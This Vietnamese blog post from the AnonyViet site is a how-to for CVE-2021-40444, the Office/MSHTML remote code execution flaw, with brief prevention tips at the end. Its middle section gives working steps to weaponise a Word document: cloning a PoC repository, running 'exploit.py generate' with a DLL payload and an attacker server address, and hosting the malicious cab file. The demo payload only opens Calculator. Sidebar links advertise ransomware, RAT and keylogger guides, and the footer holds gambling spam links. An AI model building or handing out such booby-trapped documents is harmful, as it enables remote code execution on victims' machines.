• Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
AnonyViet
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
No Result
View All Result
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
No Result
View All Result
AnonyViet
No Result
View All Result

PoC CVE-2021-40444 – Đính kèm Virus vào File Word

AnonyViet by AnonyViet
11/09/2021
in Virus-Trojan-Rat
Reading Time: 4 mins read
A A
1

Mục lục bài viết

  1. PoC CVE-2021-40444 là gì?
  2. Đính kèm mã độc vào file Word, Excel, PowerPoint
  3. Làm sao ngăn chặn file Word độc hại CVE-2021-40444

CVE-2021-40444 là mã lỗ hổng bảo mật mới nhất được sử dụng để tấn công Windows bằng file Word, Excel, PowerPoint. Tính đến thời điểm này, Microsoft chưa có bản vá cho Windows và chúng ta cần phải chờ đến bản vá lỗi định kỳ vào thứ 3 tuần tới. Tuy nhiên Defender vẫn có thể nhận diện được mã độc được đính kèm. HIện nay đã có Tool PoC CVE-2021-40444 giúp bạn thực nghiệm việc đính virus vào file văn bản gồm các sản phẩm của Microsoft nha CVE-2021-40444. Bài viết này chủ yếu dịch theo bài gốc của github vào mục đích nghiên cứu, vui lòng không lợi dụng để vi phạm pháp luật.

PoC CVE-2021-40444 là gì?

Mã CVE-2021-40444 không phải là một lỗ hổng Office hoàn toàn, vì việc khai thác tận dụng MSHTML web renderer (Internet Explorer) ActiveX control. Tuy không phải là một trình duyệt hoàn chỉnh nhưng nó là một “web engine” cốt lõi của Internet Explorer và có thể được sử dụng riêng để tạo các phiên trình duyệt hoặc ứng dụng giống như trình duyệt cần hoặc muốn hiển thị các tệp HTML.

Các bài viết liên quan

Ransomware là gì? 4

Ransomware là gì?

15/07/2022
xoa file mo gan day word

Cách xóa lịch sử mở File gần đây trên Word

14/06/2022
Follina

Demo cách Khai thác lỗ hổng Follina của Microsoft Word

06/06/2022
ma doc dinh kem file word

Cảnh giác thủ đoạn đính kèm Virus vào File Word mới nhất 2022

31/05/2022

Chính vì vậy, để khai thác CVE-2021-40444, kẻ tấn công chỉ cần DOCX, RTF hoặc bất kỳ tệp nào khác có thể trỏ đến OLE objects từ xa. Hiện vẫn chưa thấy có dấu hiệu khai thác lỗ hỏng nguy hiểm này từ các tin tặc ngoài việc chỉ thông qua Microsoft Office

Phần mềm tạo file docx độc hại để khai thác mã lỗi CVE-2021-40444 (Thực thi mã từ xa Microsoft Office Word).

Việc tạo Tập lệnh này dựa trên một số kỹ thuật đảo ngược đối với mẫu được sử dụng trong tự nhiên: 938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52 (tệp docx)

Bạn cần cài đặt lcab trước ( sudo apt-get install lcab)

Nếu file cab đã tạo của bạn không hoạt động, hãy thử trỏ tới file URL trong explore.html tới calc.cab

Đính kèm mã độc vào file Word, Excel, PowerPoint

Công cụ này sẽ giúp bạn tạo ra một file Word độc hại, khi mở file , sẽ có một hàm trỏ tới test/calc.dll dùng để mở chương trình máy tính Calculator của Windows lên.

Trước tiên chúng ta cần tải PoC CVE-2021-40444

git clone https://github.com/anonyvietofficial/CVE-2021-40444.git

python3 exploit.py generate test/calc.dll http://<SRV IP>

download PoC CVE-2021-40444

File word được đính kèm mã độc sẽ nằm trong thư mục out, file cab độc hại nằm trong thư mục srv. Bây giờ bạn có thể thiết lập Server

PoC CVE-2021-40444 - Đính kèm Virus vào File Word 3

Thử mở file docx vừa được tạo trong máy ảo, chúng ta sẽ thấy File Word mở lên và chương trình máy tính Calculator cũng mở lên theo.

Làm sao ngăn chặn file Word độc hại CVE-2021-40444

Nếu bạn nhận file Word từ những nguồn đáng ngờ, trước tiên cần quét Virus từ các phần mềm chính hãng có bản quyền.

Nếu chỉ có nhu cầu đọc file, không có nhu cầu sửa file thì không nên bật chế độ Protected View “Enable Editing”.

Enable Editing

Nếu bạn cần sửa file, tốt nhất là upload file lên Google Drive, sau đó dùng tính năng của Google Tài liệu để chỉnh sửa.

Tags: cveCVE-2021-40444mã độcmicrosoft wordPoCWordđính kèm virus vào word
Previous Post

7 công cụ ẩn của Google mà bạn chưa biết

Next Post

Yandex bị DDoS bởi 200.000 thiết bị mã độc Botnet

AnonyViet

AnonyViet

Kiến thức như một ngọn lửa, càng chia sẽ nó sẽ càng bùng cháy!

Related Posts

Ransomware là gì? 5
Virus-Trojan-Rat

Ransomware là gì?

15/07/2022
Cách tạo Ransomware bằng Python 6
Virus-Trojan-Rat

Cách tạo Ransomware bằng Python

13/07/2022
Cách hacker Bypass AntiVirus trên máy tính của bạn 7
Virus-Trojan-Rat

Cách hacker Bypass AntiVirus trên máy tính của bạn

01/06/2022 - Updated on 05/06/2022
Hướng dẫn tạo AIRAVAT: RAT Android bí mật theo dõi điện thoại 8
Virus-Trojan-Rat

Hướng dẫn tạo AIRAVAT: RAT Android bí mật theo dõi điện thoại

17/05/2022
Teardroid android rat
Virus-Trojan-Rat

Tạo RAT cho Android bằng Teardroid-v4 để quản lý điện thoại từ xa

08/03/2022
SATANKLGR - Phần mềm tạo Keylogger chỉ bằng Python 9
Virus-Trojan-Rat

SATANKLGR – Phần mềm tạo Keylogger chỉ bằng Python

19/01/2022
Next Post
yandex bi ddos

Yandex bị DDoS bởi 200.000 thiết bị mã độc Botnet

guest

guest

Website này sử dụng Akismet để hạn chế spam. Tìm hiểu bình luận của bạn được duyệt như thế nào.

1 Comment
oldest
newest
Inline Feedbacks
View all comments
opc3
opc3
11 months ago

admin là thành viên cũ của HVA à

Reply
wpdiscuz   wpDiscuz

Liên hệ Quảng Cáo

Lien he AnonyViet

Đối tác —

Fshare

Các bài mới

Chuyện gì đang xảy ra khi máy tính ở chế độ Sleep 10

Chuyện gì đang xảy ra khi máy tính ở chế độ Sleep

14/08/2022
nhận 160k miễn phí tại tothost

Cách nhận 160.000đ để mua Hosting/VPS của TotHost [Độc quyền AnonyViet]

13/08/2022
curl la gi

Cách tham số cần biết khi dùng lệnh Curl

13/08/2022
Cách sử dụng chế độ Together trong Microsoft Teams phiên bản web 11

Cách sử dụng chế độ Together trong Microsoft Teams phiên bản web

13/08/2022
Một chút Writeup về Skynet 12

Một chút Writeup về Skynet

12/08/2022

Ads

Giới thiệu

AnonyViet

AnonyViet

Nơi chia sẻ những kiến thức mà bạn chưa từng được học trên ghế nhà trường!

Chúng tôi sẵn sàng đón những ý kiến đóng góp, cũng như bài viết của các bạn gửi đến AnonyViet.

Hãy cùng AnonyViet xây dựng một cộng đồng CNTT lớn mạnh nhất!

Giới thiệu

AnonyViet là Website chia sẻ miễn phí tất cả các kiến thức về công nghệ thông tin. AnonyViet cung cấp mọi giải pháp về mạng máy tính, phần mềm, đồ họa và MMO.

Liên hệ

Email: anonyviet.com[@]gmail.com

1409 Hill Street #01-01A
Old Hill Street Police Station
Singapore 179369

 

Bản quyền: DMCA.com Protection Status

Phản hồi gần đây

  • AnonyViet trong Cách nhận 160.000đ để mua Hosting/VPS của TotHost [Độc quyền AnonyViet]
  • Duy trong Cách nhận 160.000đ để mua Hosting/VPS của TotHost [Độc quyền AnonyViet]
  • Quang trong Cách nhận 160.000đ để mua Hosting/VPS của TotHost [Độc quyền AnonyViet]
  • Trg trong Cách nhận 160.000đ để mua Hosting/VPS của TotHost [Độc quyền AnonyViet]
  • olalavui trong Cách nhận 160.000đ để mua Hosting/VPS của TotHost [Độc quyền AnonyViet]

©2022 AnonyViet - Chúng tôi mang đến cho bạn những kiến thức bổ ích về Công nghệ. Google iwin888 Bing tải game iwin Github tải iwin apk Github tải win456 Youtube ku fun wikipedia 88vin reddit twin 92lottery tải tdtc stackoverflow tool tài xỉu 68 club 68 game bài iwinclub.link mua nick facebook

No Result
View All Result
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC

©2022 AnonyViet - Chúng tôi mang đến cho bạn những kiến thức bổ ích về Công nghệ. Google iwin888 Bing tải game iwin Github tải iwin apk Github tải win456 Youtube ku fun wikipedia 88vin reddit twin 92lottery tải tdtc stackoverflow tool tài xỉu 68 club 68 game bài iwinclub.link mua nick facebook

wpDiscuz
pixel